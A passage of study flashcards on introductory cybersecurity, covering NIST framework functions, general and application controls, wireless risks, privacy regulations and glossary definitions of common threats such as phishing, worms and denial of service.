  > Reset browser home page
  > Redirect search requests
  > Slow computer performance by taking up memory
Wireless Security Challenges
- Smartphones are as vulnerable as computers
- Radio frequency bands are easy to scan
- SSIDs (service set identifiers)
  > Identify access points
  > Are broadcast multiple times
  > Can be identified by sniffer programs
Types of General Controls
- Software controls - Hardware controls - Computer operations controls - Data security controls - Implementation controls - Administrative controls
Application Controls
- Specific controls unique to each computerized application, such as payroll or order processing
- Include both automated and manual procedures
- Ensure that only authorized data are completely and accurately processed by that application
- Include:
  > Input controls
  > Processing controls
  > Output controls
Encryption
- Transforming text or data into cipher text that cannot be read by unintended recipients
- Two methods for encryption on networks
  > Symmetric key encryption
  > Public key encryption
Whitelisting and Blacklisting
- Whitelisting: Allows acceptable software to run and acceptable connections/e-mail to be accepted
- Blacklisting: Allows everything to run unless it is on the blacklist
what is the role of people in cybersecurity
- giving people the skills and information to implement an effective cybersecurity program - training, awareness, building skills
why is the perimeter model not fully effective in cybersecurity
- the perimeter is not perfect and is only one layer
- you have to violate the perimeter all the time to share information between authorized users
- too many doors and windows
Legal and regulatory requirements for electronic records management and privacy protection
- *GDPR:* General Data Protection Regulation (EU-only regulation)
- *HIPAA:* Medical security and privacy rules and procedures
- *Gramm-Leach-Bliley Act:* Requires financial institutions to ensure the security and confidentiality of customer data
- *Sarbanes-Oxley Act:* Imposes responsibility on companies and their management to safeguard the accuracy and integrity of financial information that is used internally and released externally
Access Point
A device that logically connects wireless client devices operating in infrastructure mode to one another and provides access to a distribution system, if connected, which is typically an organization's enterprise wired network. SOURCE: SP 800-48; SP 800-121
Access Control Lists (ACLs)
A register of: 1. users (including groups, machines, processes) who have been given permission to use a particular system resource, and 2. the types of access they have been permitted. SOURCE: SP 800-12
Administrative Account
A user account with full privileges on a computer.
Access
Ability to make use of any information system (IS) resource. Ability and means to communicate with or otherwise interact with a system, to use system resources to handle information, to gain knowledge of the information the system contains, or to control system components and functions.
Advanced Persistent Threats (APT)
An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders' efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives.
Active Attack
An attack that alters a system or data. An attack on the authentication protocol where the Attacker transmits data to the Claimant, Credential Service Provider, Verifier, or Relying Party. Examples of active attacks include man-in-the-middle, impersonation, and session hijacking.
What is the Detect function in the NIST model?
Detect: Identifying the occurrence of a cybersecurity event (an incursion or attempted incursion) in a timely manner
Details: The Detect Function defines the appropriate activities to identify the occurrence of a cybersecurity event. The Detect Function enables timely discovery of cybersecurity events. Examples of outcome Categories within this Function include:
- Ensuring Anomalies and Events are detected, and their potential impact is understood
- Implementing Security Continuous Monitoring capabilities to monitor cybersecurity events and verify the effectiveness of protective measures, including network and physical activities
- Maintaining Detection Processes to provide awareness of anomalous events
Risk Assessment
Determines the level of risk to the firm if a specific activity or process is not properly controlled
- Types of threat
  > Probability of occurrence during the year
  > Potential losses, value of threat
  > Expected annual loss
Disaster Recovery Planning
Devises plans for restoration of disrupted services
What is War Driving
Eavesdroppers drive by buildings and try to detect SSIDs and gain access to the network and resources
  > Once the access point is breached, the intruder can use the OS to access networked drives and files
Active Content
Electronic documents that can carry out or trigger actions automatically on a computer platform without the intervention of a user. Software in various forms that is able to automatically carry out or trigger actions on a computer platform without the intervention of a user.
Denial of Service attacks (DoS)
Flooding server with thousands of false requests (such as trying to login to the website) to crash the network
Business continuity planning
Focuses on restoring business operations after disaster
What is the Identify function in the NIST model?
Identify: The Identify Function assists in developing an organizational understanding of managing cybersecurity risk to systems, people, assets, data, and capabilities. Understanding the business context, the resources that support critical functions, and the related cybersecurity risks enables an organization to focus and prioritize its efforts, consistent with its risk management strategy and business needs. Examples of outcome Categories within this Function include:
- Identifying physical and software assets within the organization to establish the basis of an Asset Management program
- Identifying the Business Environment the organization supports, including the organization's role in the supply chain and the organization's place in the critical infrastructure sector
- Identifying cybersecurity policies established within the organization to define the Governance program, as well as identifying legal and regulatory requirements regarding the cybersecurity capabilities of the organization
- Identifying asset vulnerabilities, threats to internal and external organizational resources, and risk response activities as a basis for the organization's Risk Assessment
- Identifying a Risk Management Strategy for the organization, including establishing risk tolerances
- Identifying a Supply Chain Risk Management strategy, including priorities, constraints, risk tolerances, and assumptions used to support risk decisions associated with managing supply chain risks
Worms
Independent programs that copy themselves from one computer to other computers over a network.
Adversary
Individual, group, organization, or government that conducts or has the intent to conduct detrimental activities.
Cybervandalism
Intentional disruption, defacement, or destruction of a Web site or corporate information system. A common tactic of hacktivists.
Alert
Notification that a specific attack has been directed at an organization's information systems.
Software Metrics
Objective assessments of a system in the form of quantified measurements
  > Number of transactions
  > Online response time
  > Payroll checks printed per hour
  > Known bugs per hundred lines of code
Ensuring System Availability
Online transaction processing requires 100% availability, no downtime
Internal Auditors
Part of accounting internal auditing that validates policies and procedures are being followed
Debugging
Process by which errors are eliminated
Adequate Security
Security commensurate with the risk and the magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Security commensurate with the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. Note: This includes assuring that information systems operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, personnel, operational, and technical controls.
Access Control Mechanism
Security safeguards (i.e., hardware and software features, physical controls, operating procedures, management procedures, and various combinations of these) designed to detect and deny unauthorized access and permit authorized access to an information system. SOURCE: CNSSI-4009
Active Security Testing
Security testing that involves direct interaction with a target, such as sending packets to a target.
Symmetric Key Encryption
Sender and receiver use single, shared key
Phishing
Setting up fake Web sites or sending e-mail messages that look like legitimate businesses to ask users for confidential personal data.
what is the Protect function in the NIST model
The Protect Function outlines appropriate safeguards to ensure delivery of critical infrastructure services. The Protect Function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of outcome Categories within this Function include:
- Protections for Identity Management and Access Control within the organization, including physical and remote access
- Empowering staff within the organization through Awareness and Training, including role-based and privileged user training
- Establishing Data Security protection consistent with the organization's risk strategy to protect the confidentiality, integrity, and availability of information
- Implementing Information Protection Processes and Procedures to maintain and manage the protections of information systems and assets
- Protecting organizational resources through Maintenance, including remote maintenance, activities
- Managing Protective Technology to ensure the security and resilience of systems and assets are consistent with organizational policies, procedures, and agreements
Identity Theft
Theft of personal Information (social security ID, driver's license, or credit card numbers) to impersonate someone else
Access Control
The process of granting or denying specific requests to: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., federal buildings, military establishments, border crossing entrances).
Accountability
The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports nonrepudiation, deterrence, fault isolation, intrusion detection and prevention, and after-action recovery and legal action. SOURCE: SP 800-27 Principle that an individual is entrusted to safeguard and control equipment, keying material, and information and is answerable to proper authority for the loss or misuse of that equipment or information. SOURCE: CNSSI-4009
What is the Recover function in the NIST model
To maintain plans for resilience and to restore services impaired during cybersecurity incidents
Details: The Recover Function identifies appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity incident. The Recover Function supports timely recovery to normal operations to reduce the impact from a cybersecurity incident. Examples of outcome Categories within this Function include:
- Ensuring the organization implements Recovery Planning processes and procedures to restore systems and/or assets affected by cybersecurity incidents
- Implementing Improvements based on lessons learned and reviews of existing strategies
- Internal and external Communications are coordinated during and following the recovery from a cybersecurity incident
What is the Respond function in the NIST model?
To take action regarding a detected cybersecurity incident to minimize impact
Details: The Respond Function includes appropriate activities to take action regarding a detected cybersecurity incident. The Respond Function supports the ability to contain the impact of a potential cybersecurity incident. Examples of outcome Categories within this Function include:
- Ensuring Response Planning processes are executed during and after an incident
- Managing Communications during and after an event with stakeholders, law enforcement, and external stakeholders as appropriate
- Analysis is conducted to ensure effective response and support recovery activities, including forensic analysis and determining the impact of incidents
- Mitigation activities are performed to prevent expansion of an event and to resolve the incident
- The organization implements Improvements by incorporating lessons learned from current and previous detection/response activities
Evil Twins
Wireless networks that pretend to offer trustworthy Wi-Fi connections to the Internet
what three goals does cybersecurity have
confidentiality, integrity, accessibility
what is the confidentiality goal of cybersecurity
ensuring no one without authorization can access information
what is the integrity goal of cybersecurity
ensuring the data hasn't been manipulated and is accurate
what is the availability goal of cybersecurity
ensuring the systems are available to the end users
what is the cybersecurity lifecycle
the components of cybersecurity according to NIST
what is the old model to approach cybersecurity
the perimeter model (hard shell, soft inside)
what is process in cybersecurity
the policies and organizational procedures used to implement and manage the cybersecurity program
what role does technology play in cybersecurity
the tools or controls used to implement the cybersecurity lifecycle